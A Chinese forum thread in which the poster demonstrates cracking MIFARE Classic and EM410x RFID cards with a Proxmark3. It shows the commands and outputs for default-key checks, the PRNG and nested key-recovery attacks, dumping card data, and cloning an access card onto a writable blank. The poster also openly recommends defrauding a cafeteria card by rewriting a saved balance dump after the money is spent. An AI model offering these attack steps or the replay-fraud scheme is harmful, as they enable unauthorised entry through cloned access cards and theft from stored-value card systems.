IC客栈

 找回密码
 立即注册
搜索
查看: 31823|回复: 42

浅谈PM3破解IC、ID卡

[复制链接]

6

主题

13

帖子

58

积分

Lv2 略知一二

Rank: 2

积分
58
发表于 2018-9-20 20:13:42 | 显示全部楼层 |阅读模式
本帖最后由 小当家 于 2018-9-20 20:15 编辑

闲来无事,就去淘了块Proxmark3,用来研究卡片破解,AU122也可以嗅探,但是远远不及Proxmark3,无论是价格还是配置方面,最近这段时间,PM3 要出 V4.0版本,将会拥有变色龙(德国友人做的一款同样的RFID安全设备)的能力。

RFID技术简介
射频识别,RFID(Radio Frequency Identification)技术,又称无线射频识别,是一种通信技术,可通过无线电讯号识别特定目标并读写相关数据,而无需识别系统与特定目标之间建立机械或光学接触。
射频的话,一般是微波,1-100GHz,适用于短距离识别通信。
RFID读写器也分移动式的和固定式的,目前RFID技术应用很广,如:图书馆,门禁系统,食品安全溯源等。
RFID层次的安全问题,我只用一些较常见的卡片写在本文进行探讨,全加密卡,CPU卡,以及金额修改等相关详细我并不会在此文写出。


常见的卡片
1.Mifare S50 (简称M1) 频率是高频 13.56M 这是最常见的卡,每张卡独一无二UID号,可存储或者修改数据,类似卡片有(学生卡。饭卡,公交卡,门禁卡)
2.Mifare UItarlight(简称MO) MO卡片频率是高频,成本很低,出厂的时候写死了UID,可存储修改数据,类似卡片(地铁卡,公交卡)
3.Mifare UID (简称UID卡) 频率是高频 是属于M1卡的变异版本,可修改UID卡,俗称的魔术卡,可以克隆完整的 M1 S50 的数据。
4.EM4XX (简称ID卡) 频率是低频 用的地方是低成本的门禁卡,小区门禁卡,停车场门禁卡这种,特点是 只能读,不能写。
5.T5577 (可随意修改ID卡) 频率低频,特点是可以用来克隆ID卡,出厂设置就是空卡。
6.HID Prox II (简称 HID) 频率低频 特点是可以插写。


设备信息如下:
Proxmark3,支持低高频的读写克隆,支持暴力破解密码,支持漏洞攻击。
1.jpg

右侧是一块高频信息读取区,左边包含了USB接口和几个小彩灯,以及各种芯片若干。

卡片信息如下:
2.jpg

上文所说明的卡,基本都齐了,我待会会用各种卡片进行讲解。

安装完成大概是这个样子。
3.jpg


红圈的地方就是低频读卡区,将卡片放在这个位置即可读取。
静静靠着他的地方,即是高频所在的区域。


思路:
卡片的安全性测试,我个人的总体流程就是如下:
首先,判断卡的类型,是IC还是ID。

如果是ID卡,那么
读卡片ID→换白卡→写入ID卡号→克隆完成→攻击成功
ID卡是低频卡,思路比较简单,IC卡为高频卡,攻击的思路可不少。

IC卡的总体思路如下:
漏洞测试→获取全卡数据→换上UID卡→写入数据→攻击成功

如果执行数据修改,思路如下:
漏洞测试→读全卡数据→解密卡片数据→破解厂商算法→修改数据→攻击成功。

IC卡攻击思路如下:
1.获得任意扇区的密码
1.1 PRNG漏洞攻击得到0扇区的密码
1.2 默认密码扫描获得密码
1.3 嗅探读卡机和卡片交互的时候获得密码,这种方式需要现场进行交互,不太方便。

2.利用 MFOC漏洞,可以暴力破解得到所有扇区的密匙。



回复

使用道具 举报

6

主题

13

帖子

58

积分

Lv2 略知一二

Rank: 2

积分
58
 楼主| 发表于 2018-9-20 20:18:01 | 显示全部楼层
本帖最后由 小当家 于 2018-9-20 20:28 编辑

M1 S50卡片破解实录
实验环境是Windows7,我没有使用Linux的,我的Linux机器是Kali linux版本,没有安装相关的驱动,就用Window的命令行进行演示。
4.jpg

使用命令 hw tune 测试高低频的天线是否没有问题,这里给出了频率,说明硬件正常工作中,进入下一步的测试。


(1)检测卡的类型
这条命令可以用来检测卡是属于什么卡,命令为 hf 14a reader

我们将我们的测试卡放置到读卡区内,输入命令进行读取。
返回结果:
proxmark3> hf 14a reader
ATQA : 00 04
UID : c0 68 ca d4
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO
proxmark3>

TYPE即是他的卡片属性,当你看到“NXP MIFARE CLASSIC 1k | Plus 2k SL1”的时候,就代表这是M1 S50的卡片,这种卡片出厂就是自带了加密的,密码不可以取消。既然知道了是什么卡片,那么就可以进行安全测试。

(2)暴力破解卡片密码
上文我们讲到了M1 S50卡片出厂自带的密码,那么我们想知道其中的数据,肯定要先对卡片进行一次密码破解,关于密码破解的命令如下:
hf mf chk *1 ? t

这条命令会枚举每个扇区的密码,然后执行一系列自动操作。
6.jpg

如图所示,Proxmark3开始执行破解,可以从图中看到,已经获得了一些明文密钥,
proxmark3> hf mf chk *1 ? t
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 4d3a99c351dd
chk default key[ 6] 1a982c7e459a
chk default key[ 7] d3f7d3f7d3f7
chk default key[ 8] 714c5c886e97
chk default key[ 9] 587ee5f9350f
chk default key[10] a0478cc39091
chk default key[11] 533cb6c723f6
chk default key[12] 8fd0a4f256e9
--sector: 0, block:  3, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector: 1, block:  7, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector: 2, block: 11, key type:A, key count:13
Found valid key:[ffffffffffff]
--sector: 3, block: 15, key type:A, key count:13

贴出了部分返回信息,可以看到,Promark3自带的字典密码都已经显示,此时Proxmark3是开始测试常用的密码,接下来会用这些密码去验证扇区的密码。
--sector: 0, block:  3, key type:A, key count:13
  Found valid key:[ffffffffffff]

这条命令需要说明的是,这代表了验证成功,0扇区的卡片密码是“ffffffffffff",如果卡片不存在这个默认的密码,则不会出现提示。

有意思是,Proxmark的字典里自带的这12种密码,包含了世界范围内发行的RFID卡片默认出厂钥匙,而国内的卡片出厂一般都是“ffffffffffff”


(3)执行漏洞攻击
接下来我们可以用PRNG漏洞进行攻击,命令如下:
hf mf mifare

7.jpg


通过这种方式同样可以获得卡片的Key,但并不是所有的卡片都存在这种漏洞,如果不存在PRNG漏洞,就需要使用另外的方法来获得卡片的Key



(4)得到卡片的所有密码
上面我提到了,对于IC卡,只需要获得一个密码就可以了,因为我们在后边可以用暴力破解的方式进行获取全卡密码。
它的指令如下:
hf mf nested 1 0 A FFFFFFFFFFFF d

这是利用一个认证漏洞,可以使用任何一个扇区的密码来获取所有扇区的密码,这种破解方式的成功率相当高。
8.jpg


-----------------------------------------------
Iterations count: 12




|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|010|  740f6dXXXXXX  | 1 |  740f6dcXXXXX  | 1 |
|011|  740f6dXXXXXX  | 1 |  740f6dXXXXXX  | 1 |
|012|  740f6dXXXXXXX | 1 |  740f6dXXXXXX  | 1 |
|013|  740f6dXXXXXX  | 1 |  740f6XXXXXXX  | 1 |
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...
proxmark3>

RES的意思是代表结果,1是密码正确,0代表密码错误。

既然我们已经知道了卡所有扇区的密码,即可导出分析了。

(5)导出数据
卡片已经攻击完成,获得了所有密匙,那么执行最后的操作,来导出卡片数据以供我们分析。

其实在上条命令里就已经生成了数据文件,bin后缀。

如果要写入其他卡片,需要将bin格式转换为eml格式,这个格式才会被Proxmark3调取并写入其他卡片。



IC卡破解总结:
克隆比较简单,修改金额要算算法,相对麻烦,不过我提供一个思路,比如修改饭卡,第一次充值200进去,把全卡数据读出来,保存。接下来你放心吃,安心吃,200吃完了,把上次保存的200饭卡数据重新写入,这样卡里又是200,你又可以安心吃了,比算算法简单十倍百倍,不过我希望你不会发生意外。

注:日后若是惹祸,不要把为师说出来就行了,你就说这是你自己原创的。

回复

使用道具 举报

6

主题

13

帖子

58

积分

Lv2 略知一二

Rank: 2

积分
58
 楼主| 发表于 2018-9-20 20:20:08 | 显示全部楼层
本帖最后由 小当家 于 2018-9-20 20:30 编辑

ID卡的破解实例
ID卡低频卡的破解方法较为简单,直接读取卡号就行,因为生活中的低频卡,都是写死了ID号,也就只能用克隆的方式进行。
proxmark3> lf search
#db# Sampling config:
#db#   [q] divisor:           95
#db#   bps:               8
#db#   [d] decimation:        1
#db#   [a] averaging:         1
#db#   [t] trigger threshold: 0
#db# Done, saved 40000 out of 40000 seen samples at 8 bits/sample


#db# buffer samples: 08 00 00 00 00 00 00 00 ...
Reading 20000 bytes from device memory


Data fetched
Samples @ 8 bits/smpl, decimation 1:1
NOTE: some demods output possible binary
if it finds something that looks like a tag
False Positives ARE possible




Checking for known tags:


EM410x pattern found:


EM TAG ID      : 700026f685
Unique TAG ID  : 0e00646fa1


Possible de-scramble patterns
HoneyWell IdentKey {
DEZ 8          : 02553477
DEZ 10         : 0002553477
DEZ 5.5        : 00038.63109
DEZ 3.5A       : 112.63109
DEZ 3.5B       : 000.63109
DEZ 3.5C       : 038.63109
DEZ 14/IK2     : 00481038890629
DEZ 15/IK3     : 000060136124321
DEZ 20/ZK      : 00140000060406151001
}
Other          : 63109_038_02553477
Pattern Paxton : 1882928261
Pattern 1      : 0x19F295 - 1700501
Pattern Sebury : 63109 38 2553477  (hex: F685 26 26F685)


Valid EM410x ID Found!
proxmark3>


文中的“700026F685”即是这张ID卡的卡号。


接着换上新的卡片,写入数据,执行克隆卡号的攻击。
proxmark3> lf em4x em410xwrite 700026F685 1 64
Writing T55x7 tag with UID 0x700026f685 (clock rate: 64)         
proxmark3> #db# Started writing T55x7 tag ...               
proxmark3> #db# Clock rate: 64               
proxmark3> #db# Tag T55x7 written with 0xffbc000159e6454e

这样子,一次ID卡的攻击也完成了。

回复

使用道具 举报

6

主题

13

帖子

58

积分

Lv2 略知一二

Rank: 2

积分
58
 楼主| 发表于 2018-9-20 20:21:54 | 显示全部楼层
本帖最后由 小当家 于 2018-9-20 20:30 编辑

无卡破解
无卡破解需要一定的成本,比如需要将Proxmark3进行改装,一直用供电,然后使Proxmark3发出模拟卡片的信号,让Proxmark本身变成一张ID卡。

我在写这篇文章的几天前录了一次电梯门卡的破解过程,但是很无语的地方是,我的iPhone中了特殊字符攻击,直接导致了白苹果,下场就是刷机了,视频搞丢了,只有一份发在朋友圈的10秒视频。

原本我已经找到了一个较为模糊的完整版视频,但是,我尝试了各个视频网进行外链提供播放,都给我删了,不过审。

也有可能是视频我录的太直接了...

最后,RFID射频技术应用的场景很多,有兴趣的同学可以继续深入。

回复

使用道具 举报

0

主题

7

帖子

36

积分

Lv1 初学乍练

Rank: 1

积分
36
发表于 2018-10-2 22:26:24 | 显示全部楼层
无卡破解变色龙不是更好一些么
回复

使用道具 举报

0

主题

39

帖子

171

积分

Lv2 略知一二

Rank: 2

积分
171

热心会员活跃会员

发表于 2018-10-8 14:16:42 | 显示全部楼层
不错,好强大啊!支持一下了。
回复

使用道具 举报

0

主题

15

帖子

38

积分

Lv1 初学乍练

Rank: 1

积分
38
发表于 2018-10-9 23:34:11 | 显示全部楼层
ID卡,直接复制卡号,里面的数据会有吗。类似水卡这种东西。
回复

使用道具 举报

0

主题

15

帖子

38

积分

Lv1 初学乍练

Rank: 1

积分
38
发表于 2018-10-9 23:39:22 | 显示全部楼层
小当家 发表于 2018-9-20 20:20
ID卡的破解实例
ID卡低频卡的破解方法较为简单,直接读取卡号就行,因为生活中的低频卡,都是写死了ID号, ...

ID卡,一个卡有两个卡号,单独复制一个,怎么把数据写到里面,PM3只能写卡号,数据怎么写,求指教
回复

使用道具 举报

1

主题

27

帖子

83

积分

Lv2 略知一二

Rank: 2

积分
83
发表于 2018-10-10 20:12:00 | 显示全部楼层
好东西,学习了。
回复

使用道具 举报

0

主题

13

帖子

30

积分

Lv1 初学乍练

Rank: 1

积分
30
发表于 2018-10-11 17:12:52 | 显示全部楼层

感谢分享,学习了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|IC客栈

GMT+8, 2024-11-27 17:11 , Processed in 0.100969 second(s), 32 queries .

Powered by ickezhan

Copyright © 2017-2023, IC客栈.

快速回复 返回顶部 返回列表